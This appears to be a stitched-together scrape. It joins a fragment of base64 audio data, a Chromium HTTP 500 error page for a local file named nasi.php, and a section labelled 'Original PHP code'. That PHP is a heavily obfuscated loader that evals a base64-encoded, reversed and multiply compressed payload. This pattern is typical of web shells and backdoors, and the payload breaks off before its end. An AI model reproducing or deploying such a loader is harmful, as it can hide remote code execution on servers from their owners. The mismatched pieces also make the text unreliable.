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"></audio>
    </template>
  </div>


<script jstcache="0">(function(){function l(a,b,c){return Function.prototype.call.apply(Array.prototype.slice,arguments)}function m(a,b,c){var e=l(arguments,2);return function(){return b.apply(a,e)}}function n(a,b){var c=new p(b);for(c.h=[a];c.h.length;){var e=c,d=c.h.shift();e.i(d);for(d=d.firstChild;d;d=d.nextSibling)1==d.nodeType&&e.h.push(d)}}function p(a){this.i=a}function q(a){a.style.display=""}function r(a){a.style.display="none"};var t=/\s*;\s*/;function u(a,b){this.l.apply(this,arguments)}u.prototype.l=function(a,b){this.a||(this.a={});if(b){var c=this.a,e=b.a;for(d in e)c[d]=e[d]}else{var d=this.a;e=v;for(c in e)d[c]=e[c]}this.a.$this=a;this.a.$context=this;this.f="undefined"!=typeof a&&null!=a?a:"";b||(this.a.$top=this.f)};var v={$default:null},w=[];function x(a){for(var b in a.a)delete a.a[b];a.f=null;w.push(a)}function y(a,b,c){try{return b.call(c,a.a,a.f)}catch(e){return v.$default}}
u.prototype.clone=function(a,b,c){if(0<w.length){var e=w.pop();u.call(e,a,this);a=e}else a=new u(a,this);a.a.$index=b;a.a.$count=c;return a};var z;window.trustedTypes&&(z=trustedTypes.createPolicy("jstemplate",{createScript:function(a){return a}}));var A={};function B(a){if(!A[a])try{var b="(function(a_, b_) { with (a_) with (b_) return "+a+" })",c=window.trustedTypes?z.createScript(b):b;A[a]=window.eval(c)}catch(e){}return A[a]}
function E(a){var b=[];a=a.split(t);for(var c=0,e=a.length;c<e;++c){var d=a[c].indexOf(":");if(!(0>d)){var g=a[c].substr(0,d).replace(/^\s+/,"").replace(/\s+$/,"");d=B(a[c].substr(d+1));b.push(g,d)}}return b};function F(){}var G=0,H={0:{}},I={},J={},K=[];function L(a){a.__jstcache||n(a,function(b){M(b)})}var N=[["jsselect",B],["jsdisplay",B],["jsvalues",E],["jsvars",E],["jseval",function(a){var b=[];a=a.split(t);for(var c=0,e=a.length;c<e;++c)if(a[c]){var d=B(a[c]);b.push(d)}return b}],["transclude",function(a){return a}],["jscontent",B],["jsskip",B]];
function M(a){if(a.__jstcache)return a.__jstcache;var b=a.getAttribute("jstcache");if(null!=b)return a.__jstcache=H[b];b=K.length=0;for(var c=N.length;b<c;++b){var e=N[b][0],d=a.getAttribute(e);J[e]=d;null!=d&&K.push(e+"="+d)}if(0==K.length)return a.setAttribute("jstcache","0"),a.__jstcache=H[0];var g=K.join("&");if(b=I[g])return a.setAttribute("jstcache",b),a.__jstcache=H[b];var h={};b=0;for(c=N.length;b<c;++b){d=N[b];e=d[0];var f=d[1];d=J[e];null!=d&&(h[e]=f(d))}b=""+ ++G;a.setAttribute("jstcache",
b);H[b]=h;I[g]=b;return a.__jstcache=h}function P(a,b){a.j.push(b);a.o.push(0)}function Q(a){return a.c.length?a.c.pop():[]}
F.prototype.g=function(a,b){var c=R(b),e=c.transclude;if(e)(c=S(e))?(b.parentNode.replaceChild(c,b),e=Q(this),e.push(this.g,a,c),P(this,e)):b.parentNode.removeChild(b);else if(c=c.jsselect){c=y(a,c,b);var d=b.getAttribute("jsinstance");var g=!1;d&&("*"==d.charAt(0)?(d=parseInt(d.substr(1),10),g=!0):d=parseInt(d,10));var h=null!=c&&"object"==typeof c&&"number"==typeof c.length;e=h?c.length:1;var f=h&&0==e;if(h)if(f)d?b.parentNode.removeChild(b):(b.setAttribute("jsinstance","*0"),r(b));else if(q(b),
null===d||""===d||g&&d<e-1){g=Q(this);d=d||0;for(h=e-1;d<h;++d){var k=b.cloneNode(!0);b.parentNode.insertBefore(k,b);T(k,c,d);f=a.clone(c[d],d,e);g.push(this.b,f,k,x,f,null)}T(b,c,d);f=a.clone(c[d],d,e);g.push(this.b,f,b,x,f,null);P(this,g)}else d<e?(g=c[d],T(b,c,d),f=a.clone(g,d,e),g=Q(this),g.push(this.b,f,b,x,f,null),P(this,g)):b.parentNode.removeChild(b);else null==c?r(b):(q(b),f=a.clone(c,0,1),g=Q(this),g.push(this.b,f,b,x,f,null),P(this,g))}else this.b(a,b)};
F.prototype.b=function(a,b){var c=R(b),e=c.jsdisplay;if(e){if(!y(a,e,b)){r(b);return}q(b)}if(e=c.jsvars)for(var d=0,g=e.length;d<g;d+=2){var h=e[d],f=y(a,e[d+1],b);a.a[h]=f}if(e=c.jsvalues)for(d=0,g=e.length;d<g;d+=2)if(f=e[d],h=y(a,e[d+1],b),"$"==f.charAt(0))a.a[f]=h;else if("."==f.charAt(0)){f=f.substr(1).split(".");for(var k=b,O=f.length,C=0,U=O-1;C<U;++C){var D=f[C];k[D]||(k[D]={});k=k[D]}k[f[O-1]]=h}else f&&("boolean"==typeof h?h?b.setAttribute(f,f):b.removeAttribute(f):b.setAttribute(f,""+h));
if(e=c.jseval)for(d=0,g=e.length;d<g;++d)y(a,e[d],b);e=c.jsskip;if(!e||!y(a,e,b))if(c=c.jscontent){if(c=""+y(a,c,b),b.innerHTML!=c){for(;b.firstChild;)e=b.firstChild,e.parentNode.removeChild(e);b.appendChild(this.m.createTextNode(c))}}else{c=Q(this);for(e=b.firstChild;e;e=e.nextSibling)1==e.nodeType&&c.push(this.g,a,e);c.length&&P(this,c)}};function R(a){if(a.__jstcache)return a.__jstcache;var b=a.getAttribute("jstcache");return b?a.__jstcache=H[b]:M(a)}
function S(a,b){var c=document;if(b){var e=c.getElementById(a);if(!e){e=b();var d=c.getElementById("jsts");d||(d=c.createElement("div"),d.id="jsts",r(d),d.style.position="absolute",c.body.appendChild(d));var g=c.createElement("div");d.appendChild(g);g.innerHTML=e;e=c.getElementById(a)}c=e}else c=c.getElementById(a);return c?(L(c),c=c.cloneNode(!0),c.removeAttribute("id"),c):null}function T(a,b,c){c==b.length-1?a.setAttribute("jsinstance","*"+c):a.setAttribute("jsinstance",""+c)};window.jstGetTemplate=S;window.JsEvalContext=u;window.jstProcess=function(a,b){var c=new F;L(b);c.m=b?9==b.nodeType?b:b.ownerDocument||document:document;var e=m(c,c.g,a,b),d=c.j=[],g=c.o=[];c.c=[];e();for(var h,f,k;d.length;)h=d[d.length-1],e=g[g.length-1],e>=h.length?(e=c,f=d.pop(),f.length=0,e.c.push(f),g.pop()):(f=h[e++],k=h[e++],h=h[e++],g[g.length-1]=e,f.call(c,k,h))};
})()</script><script jstcache="0">// Copyright 2012 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @fileoverview
 * NOTE: This file is deprecated, and provides only the minimal LoadTimeData
 * functions for places in the code still not using JS modules. Use
 * load_time_data.m.js in all new code.
 *
 * This file defines a singleton which provides access to all data
 * that is available as soon as the page's resources are loaded (before DOM
 * content has finished loading). This data includes both localized strings and
 * any data that is important to have ready from a very early stage (e.g. things
 * that must be displayed right away).
 *
 * Note that loadTimeData is not guaranteed to be consistent between page
 * refreshes (https://crbug.com/740629) and should not contain values that might
 * change if the page is re-opened later.
 */

/** @type {!LoadTimeData} */
// eslint-disable-next-line no-var
var loadTimeData;

class LoadTimeData {
  constructor() {
    /** @type {?Object} */
    this.data_ = null;
  }

  /**
   * Sets the backing object.
   *
   * Note that there is no getter for |data_| to discourage abuse of the form:
   *
   *     var value = loadTimeData.data()['key'];
   *
   * @param {Object} value The de-serialized page data.
   */
  set data(value) {
    expect(!this.data_, 'Re-setting data.');
    this.data_ = value;
  }

  /**
   * @param {string} id An ID of a value that might exist.
   * @return {boolean} True if |id| is a key in the dictionary.
   */
  valueExists(id) {
    return id in this.data_;
  }

  /**
   * Fetches a value, expecting that it exists.
   * @param {string} id The key that identifies the desired value.
   * @return {*} The corresponding value.
   */
  getValue(id) {
    expect(this.data_, 'No data. Did you remember to include strings.js?');
    const value = this.data_[id];
    expect(typeof value !== 'undefined', 'Could not find value for ' + id);
    return value;
  }

  /**
   * As above, but also makes sure that the value is a string.
   * @param {string} id The key that identifies the desired string.
   * @return {string} The corresponding string value.
   */
  getString(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'string');
    return /** @type {string} */ (value);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument.
   * @param {string} id The ID of the string we want.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  getStringF(id, var_args) {
    const value = this.getString(id);
    if (!value) {
      return '';
    }

    const args = Array.prototype.slice.call(arguments);
    args[0] = value;
    return this.substituteString.apply(this, args);
  }

  /**
   * Returns a formatted localized string where $1 to $9 are replaced by the
   * second to the tenth argument. Any standalone $ signs must be escaped as
   * $$.
   * @param {string} label The label to substitute through.
   *     This is not an resource ID.
   * @param {...(string|number)} var_args The extra values to include in the
   *     formatted output.
   * @return {string} The formatted string.
   */
  substituteString(label, var_args) {
    const varArgs = arguments;
    return label.replace(/\$(.|$|\n)/g, function(m) {
      expect(m.match(/\$[$1-9]/), 'Unescaped $ found in localized string.');
      return m === '$$' ? '$' : varArgs[m[1]];
    });
  }

  /**
   * As above, but also makes sure that the value is a boolean.
   * @param {string} id The key that identifies the desired boolean.
   * @return {boolean} The corresponding boolean value.
   */
  getBoolean(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'boolean');
    return /** @type {boolean} */ (value);
  }

  /**
   * As above, but also makes sure that the value is an integer.
   * @param {string} id The key that identifies the desired number.
   * @return {number} The corresponding number value.
   */
  getInteger(id) {
    const value = this.getValue(id);
    expectIsType(id, value, 'number');
    expect(value === Math.floor(value), 'Number isn\'t integer: ' + value);
    return /** @type {number} */ (value);
  }

  /**
   * Override values in loadTimeData with the values found in |replacements|.
   * @param {Object} replacements The dictionary object of keys to replace.
   */
  overrideValues(replacements) {
    expect(
        typeof replacements === 'object',
        'Replacements must be a dictionary object.');
    for (const key in replacements) {
      this.data_[key] = replacements[key];
    }
  }
}

/**
 * Checks condition, throws error message if expectation fails.
 * @param {*} condition The condition to check for truthiness.
 * @param {string} message The message to display if the check fails.
 */
function expect(condition, message) {
  if (!condition) {
    throw new Error(
        'Unexpected condition on ' + document.location.href + ': ' + message);
  }
}

/**
 * Checks that the given value has the given type.
 * @param {string} id The id of the value (only used for error message).
 * @param {*} value The value to check the type on.
 * @param {string} type The type we expect |value| to be.
 */
function expectIsType(id, value, type) {
  expect(
      typeof value === type, '[' + value + '] (' + id + ') is not a ' + type);
}

expect(!loadTimeData, 'should only include this file once');
loadTimeData = new LoadTimeData();

// Expose |loadTimeData| directly on |window|, since within a JS module the
// scope is local and not all files have been updated to import the exported
// |loadTimeData| explicitly.
window.loadTimeData = loadTimeData;

console.warn('crbug/1173575, non-JS module files deprecated.');
</script><script jstcache="0">const pageData = {"details":"Details","errorCode":"HTTP ERROR 500","fontfamily":"\"sans\", Arial, sans-serif","fontsize":"75%","heading":{"hostName":"localhost","msg":"This page isn’t working"},"hideDetails":"Hide details","iconClass":"icon-generic","language":"en","reloadButton":{"msg":"Reload","reloadUrl":"http://localhost/nasi.php"},"suggestionsDetails":[],"suggestionsSummaryList":[],"summary":{"failedUrl":"http://localhost/nasi.php","hostName":"localhost","msg":"\u003Cstrong jscontent=\"hostName\">\u003C/strong> is currently unable to handle this request."},"textdirection":"ltr","title":"localhost"};loadTimeData.data = pageData;var tp = document.getElementById('t');jstProcess(new JsEvalContext(pageData), tp);</script></body></html>

Original PHP code

<?php
$gz = "ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==";
$gzinflate = "==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